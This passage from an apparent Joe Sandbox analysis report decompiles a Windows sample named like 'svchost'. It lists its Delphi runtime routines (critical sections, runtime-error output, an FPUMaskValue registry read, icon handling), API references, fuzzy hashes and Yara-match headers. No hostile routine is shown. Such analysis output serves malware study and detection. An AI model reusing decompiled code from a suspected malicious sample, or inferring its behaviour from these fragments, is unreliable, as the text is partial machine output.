                                                                          					if( *0x40a035 != 0) {
                                                                          						_push(0x40a5b4);
                                                                          						L004010E4();
                                                                          					}
                                                                          					 *0x40a5ac = 0;
                                                                          					_t3 =  *0x40a60c; // 0x570960
                                                                          					LocalFree(_t3);
                                                                          					 *0x40a60c = 0;
                                                                          					_t19 =  *0x40a5d4; // 0x571f74
                                                                          					while(_t19 != 0x40a5d4) {
                                                                          						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                          						_t19 =  *_t19;
                                                                          					}
                                                                          					E0040114C(0x40a5d4);
                                                                          					E0040114C(0x40a5e4);
                                                                          					E0040114C(0x40a610);
                                                                          					_t14 =  *0x40a5cc; // 0x571960
                                                                          					while(_t14 != 0) {
                                                                          						 *0x40a5cc =  *_t14;
                                                                          						LocalFree(_t14);
                                                                          						_t14 =  *0x40a5cc; // 0x571960
                                                                          					}
                                                                          					_pop(_t23);
                                                                          					 *[fs:eax] = _t23;
                                                                          					_push(0x401929);
                                                                          					if( *0x40a035 != 0) {
                                                                          						_push(0x40a5b4);
                                                                          						L004010EC();
                                                                          					}
                                                                          					_push(0x40a5b4);
                                                                          					L004010F4();
                                                                          					return 0;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                          • LocalFree.KERNEL32(00570960,00000000,00401922), ref: 0040188B
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00570960,00000000,00401922), ref: 004018AA
                                                                          • LocalFree.KERNEL32(00571960,?,00000000,00008000,00570960,00000000,00401922), ref: 004018E9
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 00401912
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 0040191C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: `W
                                                                          • API String ID: 3782394904-2472242476
                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 0040B311
                                                                          • LocalFree.KERNEL32(00570960,00000000,00401922), ref: 0040B323
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,00570960,00000000,00401922), ref: 0040B342
                                                                          • LocalFree.KERNEL32(00571960,?,00000000,00008000,00570960,00000000,00401922), ref: 0040B381
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 0040B3AA
                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,00570960,00000000,00401922), ref: 0040B3B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: `W
                                                                          • API String ID: 3782394904-2472242476
                                                                          • Opcode ID: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction ID: 308c92a7e2b5e7ecfd07cead530b628894948fc1d130f20f37bfe88cfaf8842a
                                                                          • Opcode Fuzzy Hash: 0f79b80e4af174c3d8e2b3e99fd1f2623f38497129b59f83d594d4178c338b32
                                                                          • Instruction Fuzzy Hash: 89115EB06043406ED711EB669D41B167BB9F745708F24843BE944B62E2C77DA870CB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 79%
                                                                          			E00402F18(void* __ecx) {
                                                                          				long _v4;
                                                                          				int _t3;
                                                                          
                                                                          				if( *0x40a034 == 0) {
                                                                          					if( *0x409024 == 0) {
                                                                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                          					}
                                                                          					return _t3;
                                                                          				} else {
                                                                          					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
                                                                          						 *0x40a220();
                                                                          					}
                                                                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                          					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
                                                                          				}
                                                                          			}






                                                                          APIs
                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileHandleWrite$Message
                                                                          • String ID: Error$Runtime error at 00000000
                                                                          • API String ID: 1570097196-2970929446
                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000000), ref: 0040C2A5
                                                                            • Part of subcall function 0040C2A0: GetKeyboardType.USER32(00000001), ref: 0040C2B1
                                                                          • GetCommandLineA.KERNEL32 ref: 0040D87B
                                                                          • GetVersion.KERNEL32 ref: 0040D88F
                                                                          • GetVersion.KERNEL32 ref: 0040D8A0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040D8DC
                                                                            • Part of subcall function 0040C2D0: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                            • Part of subcall function 0040C2D0: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                            • Part of subcall function 0040C2D0: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          • GetThreadLocale.KERNEL32 ref: 0040D8BC
                                                                            • Part of subcall function 0040D74C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 0040D772
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
• Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3734044017-0
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 917de0a484455ad82c20158439a2a24f06621c5804a29fc775aa2cf17b207d74
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: F10129B1C113449AE711BFB1AA463193A60AB1130CF10857FD151762E2EB7D00A8DB6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00403D7D(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                          				long _t11;
                                                                          				void* _t16;
                                                                          
                                                                          				_t16 = __ebx;
                                                                          				 *__edi =  *__edi + __ecx;
                                                                          				 *((intOrPtr*)(__eax - 0x40a5a4)) =  *((intOrPtr*)(__eax - 0x40a5a4)) + __eax - 0x40a5a4;
                                                                          				 *0x40900c = 2;
                                                                          				 *0x40a010 = 0x401008;
                                                                          				 *0x40a014 = 0x401010;
                                                                          				 *0x40a036 = 2;
                                                                          				 *0x40a000 = E00403960;
                                                                          				if(E00402808() != 0) {
                                                                          					_t3 = E00402838();
                                                                          				}
                                                                          				E004028FC(_t3);
                                                                          				 *0x40a03c = 0xd7b0;
                                                                          				 *0x40a208 = 0xd7b0;
                                                                          				 *0x40a3d4 = 0xd7b0;
                                                                          				 *0x40a02c = GetCommandLineA();
                                                                          				 *0x40a028 = E00401098();
                                                                          				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                          					 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                          				} else {
                                                                          					if((GetVersion() & 0x000000ff) <= 4) {
                                                                          						 *0x40a5a8 = E00403CB4(GetThreadLocale(), _t16, __eflags);
                                                                          					} else {
                                                                          						 *0x40a5a8 = 3;
                                                                          					}
                                                                          				}
                                                                          				_t11 = GetCurrentThreadId();
                                                                          				 *0x40a020 = _t11;
                                                                          				return _t11;
                                                                          			}






                                                                          APIs
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000000), ref: 0040280D
                                                                            • Part of subcall function 00402808: GetKeyboardType.USER32(00000001), ref: 00402819
                                                                          • GetCommandLineA.KERNEL32 ref: 00403DE3
                                                                          • GetVersion.KERNEL32 ref: 00403DF7
                                                                          • GetVersion.KERNEL32 ref: 00403E08
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00403E44
                                                                            • Part of subcall function 00402838: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                            • Part of subcall function 00402838: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                            • Part of subcall function 00402838: RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          • GetThreadLocale.KERNEL32 ref: 00403E24
                                                                            • Part of subcall function 00403CB4: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00403D1A), ref: 00403CDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3734044017-0
                                                                          • Opcode ID: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction ID: 4e42c8c4ff7c9e6347351f52ed3844a5f6dcad7449c2d11acc3bcf8107044070
                                                                          • Opcode Fuzzy Hash: 0632ebee869107818fc617476dd3b707cbc1511b343300be66bfea40396029a6
                                                                          • Instruction Fuzzy Hash: 7B016DB180438599E710BF72AA4A3193E64AB11309F10853FA080BA3F3D77D06989B6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 65%
                                                                          			E00402838() {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				int _v16;
                                                                          				signed short _t12;
                                                                          				signed short _t14;
                                                                          				intOrPtr _t27;
                                                                          				void* _t29;
                                                                          				void* _t31;
                                                                          				intOrPtr _t32;
                                                                          
                                                                          				_t29 = _t31;
                                                                          				_t32 = _t31 + 0xfffffff4;
                                                                          				_v12 =  *0x409018 & 0x0000ffff;
                                                                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                          					_t12 =  *0x409018; // 0x1332
                                                                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                          					 *0x409018 = _t14;
                                                                          					return _t14;
                                                                          				} else {
                                                                          					_push(_t29);
                                                                          					_push(E004028A9);
                                                                          					_push( *[fs:eax]);
                                                                          					 *[fs:eax] = _t32;
                                                                          					_v16 = 4;
                                                                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                          					_pop(_t27);
                                                                          					 *[fs:eax] = _t27;
                                                                          					_push(0x4028b0);
                                                                          					return RegCloseKey(_v8);
                                                                          				}
                                                                          			}



                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040285A
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040288D
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004028A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: a813fbf5fdd61ad2e6297c1d03dc0b5dcb1e266bf9714427259c3b0395662638
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 9D018D7A940308B9EB11EF90CD46FEA77ACDB04700F104177B904F65D0E6785A54D79C
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                          • API String ID: 3677997916-4173385793
                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                          • String ID: `W
                                                                          • API String ID: 730355536-2472242476
                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
                                                                          				void _v32;
                                                                          				void* _v40;
                                                                          				void* _v48;
                                                                          				void* _v52;
                                                                          				void* _t17;
                                                                          				void* _t20;
                                                                          				struct _ICONINFO* _t23;
                                                                          
                                                                          				_t9 = __eax;
                                                                          				_t20 = __eax;
                                                                          				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
                                                                          					E004064E4(__eax);
                                                                          					_t9 = __edx;
                                                                          					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
                                                                          					if(__edx != 0) {
                                                                          						GetIconInfo(__edx, _t23);
                                                                          						GetObjectA(_v40, 0x18,  &_v32);
                                                                          						 *(_t20 + 0x18) = _v40;
                                                                          						_t17 = _v52;
                                                                          						if(_t17 != 0) {
                                                                          							DeleteObject(_t17);
                                                                          						}
                                                                          						_t9 = _v48;
                                                                          						if(_t9 != 0) {
                                                                          							return DeleteObject(_t9);
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t9;
                                                                          			}


                                                                          APIs
                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                          • String ID:
                                                                          • API String ID: 3133107492-0
                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 0040B220: RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                            • Part of subcall function 0040B220: RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                            • Part of subcall function 0040B220: LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                            • Part of subcall function 0040B220: RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,Function_00001FF0), ref: 0040B957
                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,Function_00001FF7), ref: 0040BA82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: `W
                                                                          • API String ID: 2227675388-2472242476
                                                                          • Opcode ID: c8d6f1cdc2855e01636b5ba2fddb86ec31b360b677cf824104232a0fc5f48131
                                                                          • Instruction ID: 0b4c2a8a148280f7eca9697b1b110deb553e61ee05e602a2dad4beec66924a59
                                                                          • Opcode Fuzzy Hash: c8d6f1cdc2855e01636b5ba2fddb86ec31b360b677cf824104232a0fc5f48131
                                                                          • Instruction Fuzzy Hash: 0F41BFB2A003019FD714CF29DD8162A77B0FB59314B29867ED581F73E1D739A8518B8E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp
                                                                          • Associated: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp
